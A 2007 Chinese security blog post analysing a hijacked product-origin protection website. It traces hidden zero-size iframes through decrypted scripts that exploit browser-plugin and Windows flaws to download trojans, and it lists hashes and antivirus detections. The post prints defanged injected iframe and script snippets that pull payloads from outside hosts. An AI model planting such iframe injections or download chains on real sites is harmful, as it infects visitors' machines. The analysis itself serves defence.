某原产地保护信息网被挂马Worm.Win32.QQPass.at等

endurer 原创
2007-11-09 第1

打开该网站,Kaspersky 报告:
/---
已检测到: 木马程序 Trojan-Clicker.HTML.IFrame.dk URL: hxxp://x*x.9***36*5.org/ip/1.htm
已检测到: 木马程序 Trojan-Clicker.HTML.IFrame.dk URL: hxxp://a*c**c.j*qx*x.org/live/index.htm
---/

检查主页代码,发现:
/---
<iframe src="hxxp://x*x.9***36*5.org/ip/1.htm" width=100 height=0></iframe>
<iframe src=hxxp://a*c**c.j*qx*x.org/live/index.htm width=100 height=0></iframe>
<iframe src="hxxp://b*oc*.s*b**b*22.com/home/index.htm" width=20 height=0></iframe>

<iframe src="hxxp://www.gxycd.com.cn/images/xs.htm" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://x*x.9***36*5.org/ip/1.htm 的内容为:
/---
<iframe src="hxxp://web**.2*0**08yi*.com/" width=0 height=0></iframe>
<iframe src="hxxp://web**.2*0**08yi*.com/dyy.htm" width=0 height=0></iframe> 
<iframe src="hxxp://a*bc.d*jx**cn.com/abc/index.htm" width=50 height=0></iframe>
---/

hxxp://web**.2*0**08yi*.com 的内容为:
/---
<iframe src="hxxp://a*a*.1*8d**d.net/ww/new82.htm" width=0 height=0></iframe>
---/

hxxp://a*a*.1*8d**d.net/ww/new82.htm 包含代码:
/---
<iframe width='0' height='0' src='hxxp://a*a*.1*8d**d.net/aa/ki.htm'></iframe>
---/

hxxp://a*a*.1*8d**d.net/aa/ki.htm 包含JavaScript脚本,经2次解密得到源代码,
功能是检查cookie变量OK,若不存在则创建,并输出代码:
/---
<script src=hxxp://a*a*.1*8d**d.net/aa/1.js></script>
<script src=hxxp://a*a*.1*8d**d.net/aa/b.js></script>
<script src=hxp://a*a*.1*8d**d.net/aa/pps.js></script>
<iframe width='10' height='10' src='hxxp://a*a*.1*8d**d.net/aa/baofeng.html'></iframe>
---/

并利用 暴风影音漏洞、BaiduBar.Tool 下载 hxxp://down.1*8d**d.net/bb/bd.cab。

hxxp://web**.2*0**08yi*.com/dyy.htm 的内容为:
/---
<iframe src="hxxp://b**bb.m*m*52*08.com/df.htm" width=0 height=0></iframe>
<iframe src="hxxp://ma*t.j*qx*x*.org/tt.htm" width=0 height=0></iframe>
---/

hxxp://a*c**c.j*qx*x.org/live/index.htm 的内容为:
/---
<iframe src="hxxp://web**.2*0**08yi*.com/" width=0 height=0></iframe>
<iframe src="hxxp://web**.2*0**08yi*.com/dyy.htm" width=0 height=0></iframe> 
<iframe src="hxxp://a*bc.d*jx**cn.com/abc/index.htm" width=50 height=0></iframe>
---/

hxxp://b*oc*.s*b**b*22.com/home/index.htm 的内容为:
/---
<iframe src="hxxp://b*oc*.s*b**b*22.com/" width=0 height=0></iframe>
<iframe src="hxxp://b**bb.m*m*52*08.com/df.htm" width=0 height=0></iframe>
<iframe src="hxxp://ma*t.j*qx*x*.org/tt.htm" width=0 height=0></iframe>
<iframe src="hxxp://a*bc.d*jx**cn.com/abc/index.htm" width=50 height=0></iframe>
---/

hxxp://b*oc*.s*b**b*22.com/ 的内容为:
/---
<iframe src="hxxp://a*a*.1*8d**d.net/ww/new82.htm" width=0 height=0></iframe>
---/

hxxp://b**bb.m*m*52*08.com/df.htm 的内容为:
/---
<iframe src="hxxp://www.i*p**5*30.com/bala.htm" width=1 height=1></iframe>
---/

hxxp://www.i*p**5*30.com/bala.htm 包含代码:
/---
<iframe width='100' height='100' src='wm/s223.htm'></iframe>
<iframe width='100' height='100' src='wm/du7.htm'></iframe>
<iframe width='100' height='100' src='wm/bu5.htm'></iframe>
---/

hxxp://www.i*p**5*30.com/wm/s223.htm 的内容为:
/---
<script language=javascript src=s321.js></script>
---/

hxxp://www.i*p**5*30.com/wm/s321.js 经过2次解密得到源代码,功能是利用 MS06-014 漏洞 下载 hxxp://www.i*p**5*30.com/down.exe,保存到 %windir%,文件名由自定义函数:
/---
function yGjnh2(RgI5d){var www="";var oveAS3=Math.random()*RgI5d;return'~tmp'+Math.round(oveAS3)+'.exe'}
---/
生成,即~tmp****.exe,****为数字,通过cmd.exe来启动。

文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-6 21:50:26
修改时间 : 2007-11-6 21:50:28
访问时间 : 2007-11-6 0:0:0
大小 : 17967 字节 17.559 KB
MD5 : 33ab065beb165e42a59f6c1a5e4a7e4e
SHA1: EAE693BE65E601116AFB639C66EE9EF1EA625469
CRC32: 8e1e4618

Scanned file:   down.exe  - Infected
down.exe - infected by Worm.Win32.QQPass.at

hxxp://www.i*p**5*30.com/wm/du7.htm 中的 JavaScript 脚本,经过2次解密得到源代码,功能是利用 Baidu bar(CLSID:{A7F05EE4-0426-454F-8013-C41E3596E9E9})下载hxxp://*2*6**8i*p**.com/baidu1.cab。

baidu1.cab 包含的文件 baidu.exe 与 down.exe 相同。

hxxp://www.i*p**5*30.com/wm/bu5.htm 中的 JavaScript 脚本,经过2次解密得到源代码,是暴风影音漏洞利用代码。

hxxp://ma*t.j*qx*x*.org/tt.htm 包含代码:
/---
<iframe src="hxxp://e*e*e*.j*open*q*c*.com/xm20.htm" width=20 height=0></iframe>
---/

hxxp://e*e*e*.j*open*q*c*.com/xm20.htm 包含代码:
/---
<HTML>
<script src=hxxp://e*e*e*.j*open*q*c*.com/ee/e.js></script>
</HTML>
<iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee1.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee2.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee3.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee4.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee5.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee6.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="hxxp://e*e*e*.j*open*q*c*.com/ee/ee.htm" width="100" height="0" frameborder="0"></iframe>
---/

hxxp://e*e*e*.j*open*q*c*.com/ee/e.js
Kaspersky 报为: 木马程序 Trojan-Downloader.JS.Psyme.sf
其内容经过1次解密得到源代码,功能为利用 MS06-014 漏洞 下载:hxxp://e*e*e*.j*open*q*c*.com/eeecom.exe,保存到 %windir%,文件名由自定义函数:
/---
function GetRan(m)

 var NumberRan = Math.random()*m;
aihao='';
 return '~Temp'+Math.round(NumberRan)+'.tmp';

---/
生成,即~tmp****.tmp,****为数字,通过cmd.exe来启动。

文件说明符 : D:/test/eeecom.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-9 14:16:54
修改时间 : 2007-11-9 14:16:55
访问时间 : 2007-11-9 14:17:17
大小 : 20284 字节 19.828 KB
MD5 : edcd02800c270bcb44956e08b422c9d4
SHA1: CD728C2655E7BA1DC694EFB6DBBD3D07033FA5CC
CRC32: 1c0d5f8a
已检测到: 病毒 Worm.Win32.Downloader.ag 文件: D:/test/eeecom.exe/PE_Patch/UPack

hxxp://e*e*e*.j*open*q*c*.com/ee/ee1.htm 内容为:
/---
<script language=javascript src=hxxp://e*e*e*.j*open*q*c*.com/ee/e2.js></script>
<script language=javascript src=hxxp://e*e*e*.j*open*q*c*.com/ee/e3.js></script>
---/

hxxp://e*e*e*.j*open*q*c*.com/ee/e2.js 与 hxxp://e*e*e*.j*open*q*c*.com/ee/e.js 相同。

hxxp://e*e*e*.j*open*q*c*.com/ee/ee2.htm 的内容经过1次解密,得到源代码,功能是利用 Baidu bar 下载 hxxp://e*e*e*.j*open*q*c*.com/eeecom.cab。

eeecom.cab 包含文件 TestSign.exe 和 TestSign.ini。

文件说明符 : D:/test/TestSign.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-1 13:5:22
修改时间 : 2007-11-1 13:5:22
访问时间 : 2007-11-6 0:0:0
大小 : 20384 字节 19.928 KB
MD5 : 509dd358fb4b41aff6def3231bdf6b79
SHA1: DDA08A6E095C4501C363FB75F1BB129A54763ED9
CRC32: 53c62eca

Scanned file:   TestSign.exe  - Infected
TestSign.exe - infected by Worm.Win32.Downloader.w
瑞星报为:Backdoor.Win32.Agent.ymv

hxxp://e*e*e*.j*open*q*c*.com/ee/ee3.htm 包含代码:
/---
<script language=javascript src=hxxp://e*e*e*.j*open*q*c*.com/ee/webxl.js></script>
---/

hxxp://e*e*e*.j*open*q*c*.com/ee/webxl.js 的内容经过1次解密,得到源代码,功能是利用 MS06-014 漏洞 创建文件创建文件C:/Documents and Settings/All Users/「开始」菜单/程序/启动/microsofts.hta,其功能为利用 迅雷漏洞,调用 C:/Progra~1/Intern~1/IEXPLORE.EXE 打开 hxxp://e*e*e*.j*open*q*c*.com/ee/webxl.htm,下载并执行ysydown[1].exe。
其中有个变量名为:Qq275756717。

hxxp://e*e*e*.j*open*q*c*.com/ee/webxl.htm
/---
<src="hxxp://e*e*e*.j*open*q*c*.com/eeecom.exe"></script>
---/

hxxp://e*e*e*.j*open*q*c*.com/eeecom.exe 与 TestSign.exe 相同。

hxxp://e*e*e*.j*open*q*c*.com/ee/ee4.htm
Kapspersky报为 木马程序 Trojan-Downloader.VBS.Small.fw
包含 VBScript代码,经2次解密得到原代码,功能是利用 MS06-014 漏洞下载:hxxp://e*e*e*.j*open*q*c*.com/eeecom.exe,保存到 %windir%,文件名由自定义函数:
/---
function gn(rRaGEykU1){var Orh2=window["Math"]["random"]()*rRaGEykU1;return'~tmp'+'.tmp'}
---/
生成,即~tmp.tmp,通过cmd.exe来启动。

hxxp://e*e*e*.j*open*q*c*.com/ee/ee5.htm 包含代码:
/---
<script language=javascript src=hxxp://e*e*e*.j*open*q*c*.com/ee/bb.js></script>
---/

hxxp://e*e*e*.j*open*q*c*.com/ee/bb.js 执行自定义函数Kao_Kaspersky(),功能是检查cookie变量Cookie1,不存在则创建,并输出代码:
/---
<iframe width=100 height=100 src="hxxp:e*e*e*.j*open*q*c*.com//ee//bf.htm/"></iframe>
---/

hxxp://e*e*e*.j*open*q*c*.com/ee/bf.htm
Kapspersky报为 恶意程序 Exploit.JS.Agent.bw

其内容经2次解密得到原代码,为暴风影音漏洞利用代码。

hxxp://e*e*e*.j*open*q*c*.com/ee/ee6.htm
Kapspersky报为 木马程序 Trojan-Downloader.JS.Small.hk

内容为jetAudio 7.x 漏洞利用代码。包含信息:
/---
jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <​​h07@interia.pl​​>
Tested on:..
- jetAudio 7.0.3 Basic
- Microsoft Internet Explorer 6
Just for fun  ;)
---/
经1次解密得到源代码,功能是分别利用 Yahoo! Messenger 控件 (clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F )漏洞 和 EDraw Office Viewer Component 5.2 ActiveX (clsid:6BA21C22-53A5-463F-BBE8-5CF7FFA0132B)漏洞下载 hxxp://*60.190.101.206/**/abc.exe,保存为 c:/uu.exe 和 c:/test.exe 并运行。

文件说明符 : D:/test/abc.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-6 22:48:10
修改时间 : 2007-11-6 22:48:12
访问时间 : 2007-11-6 0:0:0
大小 : 20380 字节 19.924 KB
MD5 : ef943281ace810485223d61354d32de4
SHA1: 00F5000E139D662C60D5E46BF744D42DFC762D25
CRC32: 5fbde357

Scanned file:   abc.exe  - Infected
abc.exe - infected by Worm.Win32.Downloader.w

瑞星报为:D:/test/abc.exe>>upack0.39 Backdoor.Win32.Agent.ymv

hxxp://a*bc.d*jx**cn.com/abc/index.htm
Kapspersky报为 木马程序 Trojan.VBS.Small.ad
其内容包括
/---
<iframe src=hxxp://a*bc.d*jx**cn.com/abc/xp017.htm width=50 height=0></iframe>
---/
及VBScript脚本,经2次解密得到原代码,功能是利用 MS06-014 漏洞下载 hxxp://a*bc.d*jx**cn.com/abc/svcos.exe,保存为 OiZQdnX.com,创建 WKvXtGU.vbs 来启动。

文件说明符 : D:/test/svcos.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-6 13:14:48
修改时间 : 2007-11-6 13:15:38
访问时间 : 2007-11-6 13:16:50
大小 : 68096 字节 66.512 KB
MD5 : 7bbf143b15089d0ada39a323429bc7c4
SHA1: 2B3BE95F577AF7D22FDBA12454E6CFF61F023693
CRC32: c534f3f1

Kaspersky 报为 已检测到: 木马程序 Trojan-Downloader.Win32.Delf.ctx 文件: D:/test/svcos.exe
瑞星报为 Trojan.Win32.Agent.zri

hxxp://a*bc.d*jx**cn.com/abc/xp017.htm 内容为:
/---
<DIV style="CURSOR: url(ah.c)"></DIV>
<script type="text/jscript">function init(){document.write("");}window.οnlοad=init;</script>
---/

hxxp://a*bc.d*jx**cn.com/abc/ah.c 利用 MS-07-002 / ANI漏洞 下载 hxxp://a*bc.d*jx**cn.com/abc/svcos.exe

hxxp://www.g*x*y*c**d.com.cn/images/xs.htm 未能打开。